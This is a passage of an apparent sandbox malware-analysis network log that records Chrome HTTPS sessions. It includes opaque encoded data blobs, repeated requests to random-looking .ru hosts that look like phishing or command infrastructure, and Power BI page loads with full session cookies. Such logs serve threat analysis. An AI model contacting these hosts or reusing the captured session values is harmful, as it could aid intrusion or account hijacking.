                                                                                                                                                                                                          2024-12-11 23:29:13 UTC1369INData Raw: 47 46 51 67 58 5a 53 55 7a 35 79 63 6c 5a 6e 57 47 6c 72 52 31 6c 38 58 6f 52 72 62 34 68 33 63 59 61 4c 62 33 5a 38 56 33 65 62 61 32 35 69 66 48 43 58 59 6f 53 55 64 57 61 4c 69 4a 74 6d 61 6f 31 73 66 35 32 4d 73 34 36 4e 67 6e 4b 54 6b 5a 69 61 6a 49 6d 73 74 4b 43 4d 73 4c 72 46 6b 35 53 2f 6c 38 61 32 68 73 79 69 73 49 6d 7a 75 37 44 55 78 4c 65 31 70 36 65 30 78 37 6e 5a 30 73 33 54 34 62 6a 4f 78 4c 71 7a 78 72 69 79 74 74 6a 69 77 36 6e 64 34 36 37 47 76 62 33 30 30 4f 4f 7a 7a 4d 58 48 38 62 61 2f 79 38 37 42 34 2b 37 33 76 64 72 6f 77 51 6e 6a 36 41 4c 47 79 76 6e 4a 32 38 58 31 37 52 59 52 39 4e 41 61 38 67 6a 35 32 68 30 41 37 78 6f 41 41 78 6f 41 45 41 58 69 39 77 59 5a 49 77 67 71 44 42 45 6d 41 41 41 6b 43 77 4d 6e 42 78 41 73 47 6a 4d 4d
                                                                                                                                                                                                          Data Ascii: GFQgXZSUz5yclZnWGlrR1l8XoRrb4h3cYaLb3Z8V3eba25ifHCXYoSUdWaLiJtmao1sf52Ms46NgnKTkZiajImstKCMsLrFk5S/l8a2hsyisImzu7DUxLe1p6e0x7nZ0s3T4bjOxLqzxriyttjiw6nd467Gvb300OOzzMXH8ba/y87B4+73vdrowQnj6ALGyvnJ28X17RYR9NAa8gj52h0A7xoAAxoAEAXi9wYZIwgqDBEmAAAkCwMnBxAsGjMM
                                                                                                                                                                                                          2024-12-11 23:29:13 UTC1369INData Raw: 45 2b 67 58 68 47 66 47 74 38 66 47 42 65 57 31 35 69 53 6f 42 49 69 34 78 75 63 59 68 58 68 34 65 50 57 59 75 62 68 4a 6c 69 64 33 78 78 6e 58 53 70 5a 59 68 35 72 6d 4b 64 72 70 4e 38 72 49 42 74 71 37 4b 79 74 4c 65 52 6a 4c 79 34 6c 4c 4b 35 68 49 4b 2b 75 38 44 47 74 71 58 46 78 62 61 4a 77 38 69 73 6a 63 53 53 73 4d 65 4b 77 63 4c 49 31 61 57 77 71 74 61 65 6d 39 76 59 33 5a 6a 6e 32 64 2f 45 31 61 7a 6c 37 72 2b 69 36 65 4c 7a 34 2b 33 45 31 2b 72 61 37 76 65 37 75 74 7a 4c 77 4e 6a 71 39 2f 76 63 2f 4e 41 46 34 4f 44 6d 2f 51 76 2b 33 41 48 6e 7a 2b 48 63 2f 67 73 55 44 52 54 6f 30 63 34 56 43 2f 45 66 47 52 76 79 48 68 38 54 34 52 67 42 47 78 30 64 2f 52 66 6e 49 41 51 66 4e 4f 59 7a 44 65 30 71 37 78 6b 61 4e 69 63 56 47 67 45 37 46 51 45 36 46
                                                                                                                                                                                                          Data Ascii: E+gXhGfGt8fGBeW15iSoBIi4xucYhXh4ePWYubhJlid3xxnXSpZYh5rmKdrpN8rIBtq7KytLeRjLy4lLK5hIK+u8DGtqXFxbaJw8isjcSSsMeKwcLI1aWwqtaem9vY3Zjn2d/E1azl7r+i6eLz4+3E1+ra7ve7utzLwNjq9/vc/NAF4ODm/Qv+3AHnz+Hc/gsUDRTo0c4VC/EfGRvyHh8T4RgBGx0d/RfnIAQfNOYzDe0q7xkaNicVGgE7FQE6F
                                                                                                                                                                                                          2024-12-11 23:29:13 UTC433INData Raw: 31 6a 6b 57 4b 69 6f 5a 70 6a 56 4a 54 54 5a 46 71 62 5a 53 51 6b 33 53 4a 6d 48 69 53 57 70 35 67 57 49 43 58 69 5a 52 31 70 61 61 61 6f 36 69 44 61 37 4b 69 63 47 2b 6e 73 34 2b 33 64 72 4f 71 6c 58 79 49 76 71 71 34 67 33 75 76 68 48 71 78 73 34 54 43 69 71 32 48 6b 4b 4f 6f 78 38 7a 53 79 73 75 67 31 73 62 51 30 38 75 78 6d 4a 4c 4f 7a 35 36 6b 7a 62 71 77 70 2b 65 35 70 62 54 71 78 4f 58 6f 79 4f 72 6f 37 4d 7a 66 73 62 6a 6d 38 75 2f 79 75 74 57 33 73 76 6e 37 76 38 54 58 2f 67 44 48 78 67 54 46 42 65 54 69 32 63 37 69 37 2b 6e 66 38 75 33 34 45 2b 6f 51 43 39 58 79 2b 64 6e 61 37 42 6f 59 38 79 63 44 34 52 49 46 36 65 59 44 4c 2b 34 72 47 76 7a 71 4e 41 76 75 37 66 55 52 4b 2f 59 47 44 6a 59 37 43 42 62 33 45 44 48 37 48 52 41 49 45 79 56 4a 41 6b
                                                                                                                                                                                                          Data Ascii: 1jkWKioZpjVJTTZFqbZSQk3SJmHiSWp5gWICXiZR1paaao6iDa7KicG+ns4+3drOqlXyIvqq4g3uvhHqxs4TCiq2HkKOox8zSysug1sbQ08uxmJLOz56kzbqwp+e5pbTqxOXoyOro7Mzfsbjm8u/yutW3svn7v8TX/gDHxgTFBeTi2c7i7+nf8u34E+oQC9Xy+dna7BoY8ycD4RIF6eYDL+4rGvzqNAvu7fURK/YGDjY7CBb3EDH7HRAIEyVJAk


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          28192.168.2.449788104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:14 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:14 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:14 GMT
                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          cf-chl-out: k0wU49qIs5WxesWNXGc+C7FQf8dSX5lz+lc=$M8gHkjVl41uGkya2
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941726fdb726b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:14 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          29192.168.2.449790172.67.189.384431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:16 UTC659OUTGET /injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC HTTP/1.1
                                                                                                                                                                                                          Host: mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Origin: https://21.zomelore.ru
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:16 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:16 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYXX85rX%2BdVItNRGu760syrSIdTfgTqTDKyqLvWhrDD0%2FAO6nsA85LEevqWU3VBw7h%2FiS3QyDSoy98xog0Y2IalRQxh2JJRuAtwUwQL7Z86r7sMVseyfGvPt3gfRBo1th1TxZOgwPVPhTfek61u6viFbKL3uGXwYn0UkmfOrhd1ODF4s1Ifu%2FdW6e0RfTn%2F8S%2B49dCgrxCBbCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f09417cff924243-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1696&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1237&delivery_rate=1432777&cwnd=193&unsent_bytes=0&cid=fa16238422196cad&ts=891&x=0"
                                                                                                                                                                                                          2024-12-11 23:29:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                          2024-12-11 23:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          30192.168.2.449794104.21.65.724431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:19 UTC457OUTGET /injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC HTTP/1.1
                                                                                                                                                                                                          Host: mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:20 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:20 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZej5icHW%2Bb00WLzQNzVWlqc5WjUuWGuYqeG3BPqwUfw7lYGxtkCeRlkrspvsErT8Y2TfV%2BjVz2CS9%2FRhSM5QbhoIxXCzpjLNBoziewD0qH7REUwUkRam9fMIkb84vPWecRDBHo9g8ksWDVSrjL3mZkobXvefd5U7qPGJJSXRXB76CZCcOpTZ6%2BiCsy6g4%2Fy3QRC%2FqRFexw5iQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941935f498c42-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1850&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1035&delivery_rate=1578378&cwnd=252&unsent_bytes=0&cid=884f3d88a70edfb0&ts=898&x=0"
                                                                                                                                                                                                          2024-12-11 23:29:20 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                          2024-12-11 23:29:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          31192.168.2.44993820.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:53 UTC727OUTGET /?pbi_source=websignup_uNav HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Referer: https://www.microsoft.com/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC1715INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 22214
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:53 GMT
                                                                                                                                                                                                          Access-Control-Allow-Origin: https://teams.powerbi.com
                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                          Set-Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; path=/; secure; HttpOnly; SameSite=Lax; partitioned
                                                                                                                                                                                                          Set-Cookie: WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; path=/;Partitioned;; secure; SameSite=None; partitioned
                                                                                                                                                                                                          Set-Cookie: EnableCSP=PROD; path=/;Partitioned;; secure; HttpOnly; SameSite=None; partitioned
                                                                                                                                                                                                          Set-Cookie: ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560;Path=/;HttpOnly;Secure;Domain=app.powerbi.com
                                                                                                                                                                                                          Set-Cookie: ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560;Path=/;HttpOnly;SameSite=None;Secure;Domain=app.powerbi.com
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://teams.powerbi.com 'self' https://res-sdf.cdn.office.net https://res.cdn.office.net https://mesh.public.onecdn.static.microsoft https://m365.cloud.microsoft https://outlook.cloud.microsoft https://teams.cloud.microsoft https://teams.microsoft.com https://gov.teams.microsoft.us https://dod.teams.microsoft.us https://outlook.office.com https://outlook-sdf.office.com https://outlook.office365.com https://outlook-sdf.office365.com https://www.office.com https://scuprodprv.www.office.com https://www.microsoft365.com https://local.loop.microsoft.com https://dev.loop.microsoft.com https://df.loop.microsoft.com https://loop.microsoft.com
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC2381INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 6f 77 65 72 20 42 49 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 3b 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" ><head> <title>Power BI</title> <meta http-equiv="X-UA-Compatible" content="IE=edge;" /> <meta charset="utf-8"> <meta name="description" content=""> <meta name="for
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC78INData Raw: 7b 20 70 75 72 70 6f 73 65 3a 20 22 43 72 69 74 69 63 61 6c 45 72 72 6f 72 22 2c 20 73 61 6d 70 6c 65 52 61 74 65 3a 20 31 20 7d 2c 7b 20 70 75 72 70 6f 73 65 3a 20 22 43 75 73 74 6f 6d 65 72 41 63 74 69 6f 6e 22 2c 20 73 61 6d 70 6c
                                                                                                                                                                                                          Data Ascii: { purpose: "CriticalError", sampleRate: 1 },{ purpose: "CustomerAction", sampl
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC4096INData Raw: 65 52 61 74 65 3a 20 31 20 7d 2c 7b 20 70 75 72 70 6f 73 65 3a 20 22 56 65 72 62 6f 73 65 22 2c 20 73 61 6d 70 6c 65 52 61 74 65 3a 20 31 20 7d 5d 20 7d 3b 0d 0a 0d 0a 20 20 20 20 70 6f 77 65 72 62 69 2e 62 75 69 6c 64 20 3d 20 27 31 33 2e 30 2e 32 34 37 36 36 2e 33 39 27 3b 0d 0a 20 20 20 20 70 6f 77 65 72 62 69 2e 62 75 69 6c 64 44 65 74 61 69 6c 73 20 3d 20 27 31 33 2e 30 2e 32 34 37 36 36 2e 33 39 27 3b 0d 0a 20 20 20 20 70 6f 77 65 72 62 69 2e 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 20 3d 20 27 32 34 31 31 2e 33 2e 32 31 39 38 30 2d 74 72 61 69 6e 27 3b 0d 0a 20 20 20 20 70 6f 77 65 72 62 69 2e 63 6f 6d 6d 6f 6e 20 3d 20 7b 7d 3b 0d 0a 20 20 20 20 70 6f 77 65 72 62 69 2e 63 6f 6d 6d 6f 6e 2e 63 75 6c 74 75 72 65 49 6e 66 6f 20 3d 20 27 65 6e 2d 55 53
                                                                                                                                                                                                          Data Ascii: eRate: 1 },{ purpose: "Verbose", sampleRate: 1 }] }; powerbi.build = '13.0.24766.39'; powerbi.buildDetails = '13.0.24766.39'; powerbi.clientVersion = '2411.3.21980-train'; powerbi.common = {}; powerbi.common.cultureInfo = 'en-US
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC4096INData Raw: 34 30 33 36 27 3b 0d 0a 20 20 20 20 76 61 72 20 6d 69 63 72 6f 73 6f 66 74 47 72 61 70 68 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 72 61 70 68 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 27 3b 0d 0a 20 20 20 20 76 61 72 20 6c 61 79 6f 75 74 54 68 65 6d 65 20 3d 20 27 66 6c 75 65 6e 74 2d 6e 6f 2d 68 65 61 64 65 72 2d 74 65 61 6c 27 3b 0d 0a 20 20 20 20 76 61 72 20 67 6c 6f 62 61 6c 55 73 65 4e 61 74 69 76 65 50 72 6f 6d 69 73 65 20 3d 20 27 66 61 6c 73 65 27 3b 0d 0a 20 20 20 20 76 61 72 20 61 64 6d 69 6e 43 65 6e 74 65 72 53 75 70 70 6f 72 74 50 61 67 65 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 6b 61 2e 6d 73 2f 63 6f 6e 74 61 63 74 2d 73 75 70 70 6f 72 74 27 3b 0d 0a 20 20 20 20 76 61 72 20 77 66 65 43 6c 75 73 74 65 72 4e 61 6d 65 20 3d 20
                                                                                                                                                                                                          Data Ascii: 4036'; var microsoftGraphUrl = 'https://graph.microsoft.com'; var layoutTheme = 'fluent-no-header-teal'; var globalUseNativePromise = 'false'; var adminCenterSupportPageUrl = 'https://aka.ms/contact-support'; var wfeClusterName =
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC4096INData Raw: 75 72 63 65 4e 61 6d 65 20 3d 20 22 68 74 74 70 73 3a 2f 2f 70 6f 77 65 72 71 75 65 72 79 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 22 3b 0d 0a 20 20 20 20 20 20 20 20 64 65 66 61 75 6c 74 46 61 62 72 69 63 48 6f 6d 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 65 6d 70 6c 61 74 65 41 70 70 73 49 6e 73 74 61 6c 6c 54 69 63 6b 65 74 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 61 63 68 65 64 45 76 65 6e 74 73 20 3d 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 67 45 76 65 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 63 68 65 64 45 76 65 6e 74 73 2e 70 75 73 68 28 65 76 65 6e
                                                                                                                                                                                                          Data Ascii: urceName = "https://powerquery.microsoft.com"; defaultFabricHome = false; var templateAppsInstallTicket = undefined; var cachedEvents = []; window.logEvent = function(event) { cachedEvents.push(even
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC4096INData Raw: 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 3d 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 7c 7c 20 7b 7d 3b 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 62 61 73 65 4d 65 74 61 64 61 74 61 50 72 6f 76 69 64 65 72 2e 6d 69 6e 2e 6a 73 27 5d 20 3d 20 7b 20 6e 6f 6d 69 6e 61 6c 53 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 73 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 69 6e 69 74 69 61 6c 3a 20 74 72 75 65 20 7d 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e
                                                                                                                                                                                                          Data Ascii: pe="text/javascript">this.parseTimeMarkers = this.parseTimeMarkers || {}; this.parseTimeMarkers['baseMetadataProvider.min.js'] = { nominalStart: Date.now(), start: Date.now(), initial: true }; </script><script type="text/javascript" src="https://content.
                                                                                                                                                                                                          2024-12-11 23:29:54 UTC3371INData Raw: 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 70 6f 77 65 72 61 70 70 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 2f 70 6f 77 65 72 62 69 77 66 65 2f 73 63 72 69 70 74 73 2f 77 65 62 2e 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 62 63 63 38 65 63 62 38 63 33 31 64 38 39 35 64 61 36 62 34 2e 6a 73 22 20 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 77 65 62 2e 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 6a 73 27
                                                                                                                                                                                                          Data Ascii: script><script type="text/javascript" src="https://content.powerapps.com/resource/powerbiwfe/scripts/web.vendors.min.bcc8ecb8c31d895da6b4.js" onerror=cdnFallback(event) ></script><script type="text/javascript">this.parseTimeMarkers['web.vendors.min.js'


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          32192.168.2.44997720.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC1133OUTGET /singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1 HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                          Referer: https://app.powerbi.com/?pbi_source=websignup_uNav
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC1796INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 16908
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:58 GMT
                                                                                                                                                                                                          Access-Control-Allow-Origin: https://teams.powerbi.com
                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                          Pragma: no-cache
